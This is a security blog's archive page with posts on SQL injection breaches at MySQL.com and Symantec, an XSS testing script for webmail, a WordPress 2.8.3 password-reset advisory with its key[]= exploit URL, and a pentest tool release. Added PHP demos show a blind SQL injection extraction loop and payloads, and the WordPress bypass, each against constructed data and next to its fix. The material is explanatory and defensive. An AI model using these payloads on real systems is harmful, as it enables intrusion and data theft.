Category: Input Validation Attacks

Mar 28 2011

MySQL and Sun websites hacked using SQL injection

MySQL.com, the official website of the database management system of the same name, was today subjected to an attack whereby hackers used SQL injection exploits to gain access to a complete list of usernames and passwords on the site.

News of the attack surfaced when the attackers posted details of the compromise on the Full Disclosure mailing list, publicly listing the database tables used to store member and employee data along with a small sample of user logins and password hashes.


Owned by Oracle, MySQL is used by millions of websites to store and deliver information, with some of the most popular online services and platforms including WordPress and Joomla utilising the software.

The attack was achieved using “blind SQL injection”, targeting MySQL.com, MySQL.fr, MySQL.de and MySQL.it, but also two Sun domains.

It appears that the attacks were not due to flaws in the MySQL software itself, but to flaws in the implementation of the websites built on it.

Jan 12 2011

Excess2 – Webmail XSS Tester

Here is a script to automate testing of webmail systems for cross-site scripting. It uses RSnake's XSS Cheat Sheet to generate the injection strings. Compared to the previous version, this version downloads the XSS Cheat Sheet on the fly (instead of having it hard-coded) and supports SMTP authentication.

Name:
excess2 – A script for testing webmail systems for cross-site scripting problems.

Description:
This script sends a number of HTML-formatted email messages to a specified email address. In order to test a webmail system you need to have an email account on the system, run this script to send messages to that account, and then view the received messages through the webmail interface. If you get a popup box saying “XSS!” it means that your webmail system failed to block the attack.

Try viewing the messages in several different browsers, including Internet Explorer and Mozilla Firefox. Some attacks work in one browser, but don’t work in another.

The script downloads RSnake’s XSS Cheat sheet from http://ha.ckers.org/xssAttacks.xml. This way we always have the latest and greatest XSS attacks. Thanks, RSnake.

Options:
-t you@webmail.example.com     The destination email address
-f return-address@example.com  From email address. Replies and rejects will go to that address.
-s mymailserver.example.com    SMTP server to use for sending messages.
-u                             SMTP server username (if it requires authentication)
-p                             SMTP server password (if it requires authentication)

Download: Excess2

Nov 28 2009

Symantec Online Store Hacked

Symantec Exposed Passwords, Serials – SQL Injection, Full Database Access

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database, including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle Unu, according to whom an insecure parameter in a script on the pcd.symantec.com website allows a blind SQL injection (SQLi) attack. In a blind SQLi attack the application never returns the query's result directly; the attacker instead injects a condition and infers data from differences in the response (a page that renders differently, or takes longer, when the condition is true), extracting the database a bit at a time. Depending on the privileges of the database account the application uses, this yields read access and sometimes write access to the underlying database.

The content of the pcd.symantec.com website is written in Japanese, but from what we could determine, it serves a product called Norton PC Doctor. The Web server appears to be running Windows Server 2000 as operating system, Microsoft IIS 6.0 with ASP support and Microsoft SQL Server 2000 as database back-end.

From the screenshots released by Unu there are many potentially interesting databases, but the one he chose to look at is called "symantecstore". One of the tables in this database is named "PaymentInformationInfo" and contains columns such as BillingAddress, CardExpirationMonth, CardExpirationYear, CardNumber, CardType, CcIssueCode, CustomerEmail, CustomerFirstName, CustomerLastName and SecurityIndicator.

Source: Unu’s Blog
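Both this post and the MySQL.com one above describe blind SQL injection without showing what the attacker actually does with it. The following is an added example, not code from Unu, Symantec or either site: a deliberately vulnerable lookup over an in-memory SQLite table, the boolean-inference loop that recovers a stored hash through it one character at a time, and the parameterised version of the same query. The table, the sample row and the id parameter are constructed for the demo; PHP 7.4 or later with the sqlite3 extension is assumed.

```php
<?php
// Added example (not from the Symantec or MySQL.com incidents): boolean-based blind
// SQL injection against a deliberately vulnerable query on an in-memory SQLite
// database, then the parameterised fix. Schema, data and parameter name are constructed.

$db = new SQLite3(':memory:');
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pwhash TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin', '5f4dcc3b')");   // constructed sample row

// Vulnerable: the request parameter is concatenated straight into the SQL.
// As in the blind cases above, the page reveals only one bit: did a row match or not.
function vulnerable_user_exists(SQLite3 $db, string $id): bool {
    $sql = "SELECT count(*) FROM users WHERE id = " . $id;
    return $db->querySingle($sql) > 0;
}

// Fixed: the value is bound as a parameter, so it can never change the query's shape.
function safe_user_exists(SQLite3 $db, string $id): bool {
    $stmt = $db->prepare("SELECT count(*) FROM users WHERE id = :id");
    $stmt->bindValue(':id', $id, SQLITE3_TEXT);
    $row = $stmt->execute()->fetchArray(SQLITE3_NUM);
    return $row[0] > 0;
}

// Attacker side: recover admin's hash one character at a time by asking only
// yes/no questions and watching whether the lookup reports a match.
function blind_extract(callable $oracle, int $maxLen = 32): string {
    $alphabet = '0123456789abcdef';   // the stored value is hex, so 16 symbols suffice
    $out = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $found = false;
        foreach (str_split($alphabet) as $c) {
            // Injected condition: true only if character $pos of admin's hash is $c.
            $payload = "1 AND substr((SELECT pwhash FROM users WHERE name='admin'),$pos,1)='$c'";
            if ($oracle($payload)) { $out .= $c; $found = true; break; }
        }
        if (!$found) break;            // no symbol matched: end of the stored string
    }
    return $out;
}

$oracle = fn(string $p) => vulnerable_user_exists($db, $p);
echo "Recovered via blind injection: " . blind_extract($oracle), "\n";   // 5f4dcc3b

// Against the parameterised query the payload is just a string compared to the id
// column; it cannot become SQL, so no row matches and nothing can be inferred.
var_dump(safe_user_exists($db, "1 AND 1=1"));   // bool(false)
var_dump(safe_user_exists($db, "1"));           // bool(true)
```

The loop needs at most 16 requests per character here; a real attack would binary-search the character range with comparisons instead of testing each symbol, but the principle is the same: one bit of information per request, so a vulnerable parameter that only ever says "found" or "not found" still gives up the whole table.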

Aug 13 2009

WordPress 2.8.3 Admin Password Reset Exploit

Topic: WordPress <= 2.8.3 Remote admin reset password
Credit: Laurent Gaffié [Laurent.gaffie(at)gmail.com]
Date: 11.08.2009
Proof Of Concept:

The way WordPress handles a password reset looks like this:
You submit your email address or username via this form
/wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like this via email:

Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin
To reset your password visit the following address:

http://domain_name.tld/wp-login.php?action=rp&key[]=

You click on the link, and then WordPress resets your admin password and sends you another email with your new credentials.
Let’s see how it works:

wp-login.php:
…[snip]…
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
…[snip]…
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
…[snip]…

line 370:

    break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

    break;
…[snip]…

You can abuse the password reset function, bypass the first step and reset the admin password by submitting an array as the $key variable.

Business Impact: An attacker could exploit this vulnerability to reset the admin account of any wordpress/wordpress-mu <= 2.8.3

Solution: WordPress has fixed this problem last night and has been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.
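To see why key[]= works, here is an added example, not WordPress code: the FakeWpdb class, its rows and the stripped-down reset_password() are stand-ins written for this page. It reproduces the three PHP behaviours the bug depends on, preg_replace() returning an array for an array subject, empty() being false for a one-element array, and the 2.8.x $wpdb->prepare() unpacking an array argument, and contrasts the 2.8.3 logic with the is_array() check added in 2.8.4. PHP 7.4 or later is assumed.

```php
<?php
// Added example (not WordPress code): a stand-in for reset_password() in 2.8.3 and
// 2.8.4 run against a fake $wpdb, so the effect of ?action=rp&key[]= can be seen
// offline. FakeWpdb, its table name and the sample rows are constructed for this demo.

class FakeWpdb {
    public $users = 'wp_users';
    private $rows;
    public function __construct(array $rows) { $this->rows = $rows; }

    // Mimics the 2.8.x prepare() behaviour that matters here: if the first argument
    // after the query is an array it becomes the argument list, so array('') -> ''.
    public function prepare($query) {
        $args = func_get_args();
        array_shift($args);
        if (isset($args[0]) && is_array($args[0]))
            $args = $args[0];
        $query = str_replace('%s', "'%s'", $query);                 // quote placeholders
        $args  = array_map(fn($a) => addslashes((string)$a), $args); // escape values
        return vsprintf($query, $args);
    }

    // Stand-in for get_row(): first user whose activation key equals the quoted
    // value in the WHERE clause, which is what MySQL would return.
    public function get_row($sql) {
        if (!preg_match("/user_activation_key = '(.*)'$/", $sql, $m))
            return null;
        $wanted = stripslashes($m[1]);
        foreach ($this->rows as $row)
            if ($row['user_activation_key'] === $wanted)
                return $row;
        return null;
    }
}

// 2.8.3 logic: preg_replace() on array('') returns array(''), empty() is false for
// a one-element array, and prepare() then collapses it to '' in the query.
function reset_password_283(FakeWpdb $wpdb, $key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( empty( $key ) )
        return 'invalid_key';
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return 'invalid_key';
    return 'reset:' . $user['user_login'];   // 2.8.3 now generates and mails a new password
}

// 2.8.4 rejects an array key before the query ever runs.
function reset_password_284(FakeWpdb $wpdb, $key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( empty( $key ) || is_array( $key ) )
        return 'invalid_key';
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return 'invalid_key';
    return 'reset:' . $user['user_login'];
}

$wpdb = new FakeWpdb([
    ['ID' => 1, 'user_login' => 'admin',  'user_activation_key' => ''],        // no reset pending
    ['ID' => 2, 'user_login' => 'editor', 'user_activation_key' => 'abc123'],  // reset pending
]);

// What PHP hands the script for the advisory's URL ?action=rp&key[]=
$_GET['key'] = [''];

echo reset_password_283($wpdb, $_GET['key']), "\n";   // reset:admin  (no valid key needed)
echo reset_password_284($wpdb, $_GET['key']), "\n";   // invalid_key
echo reset_password_284($wpdb, 'abc123'), "\n";       // reset:editor (legitimate flow still works)
```

The empty-string match is the whole trick: every account that has no reset pending has an empty user_activation_key, and the first such row in the table is normally the administrator created at install. Because the new password is mailed to the account's own address (as the advisory's step 3 describes), the attacker does not learn it; the impact is a forced reset of the admin account on demand, which is a denial of service rather than a takeover.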

Feb 19 2009

Fast-Track 4.0

Fast-Track

Automated penetration suite for penetration testers.

Author: David Kennedy, Partner, Practice Lead
Release: February 7, 2009 @ ShmooCon by SecureState

For those new to Fast-Track: Fast-Track is a Python-based open-source project aimed at helping penetration testers identify, exploit, and further penetrate a network. Fast-Track was originally conceived when David Kennedy was on a penetration test and found that there was generally a lack of tools or automation for certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of David's advanced attacks and pass them on to the team at SecureState, David ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitising of client-side data within web applications, poor patch management, or a lack of hardening. All of these are relatively simple to fix if you know what to look for, but they are extremely common findings for us as penetration testers. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back, relax, crack open a can of Jolt Cola and enjoy the ride.

Tested on:
Linux: Slackware, Debian, Ubuntu, Back|Track 3, Back|Track 4, Gentoo, RedHat
Other: FreeBSD, OpenBSD, OS X

Dependencies: Metasploit 3, SQLite, pymssql, FreeTDS, Pexpect, ClientForm, Beautiful Soup, and Psyco.

Installation instructions: after extracting the tarball, run the setup script with python setup.py install. This installs the needed dependencies except SQLite and Metasploit 3; you should specify the Metasploit path, or it will default to the BackTrack 3 installation. Once the installation is completed, Fast-Track should be fully functional.

Download :
http://www.securestate.com/files/fasttrack/fasttrack.tgz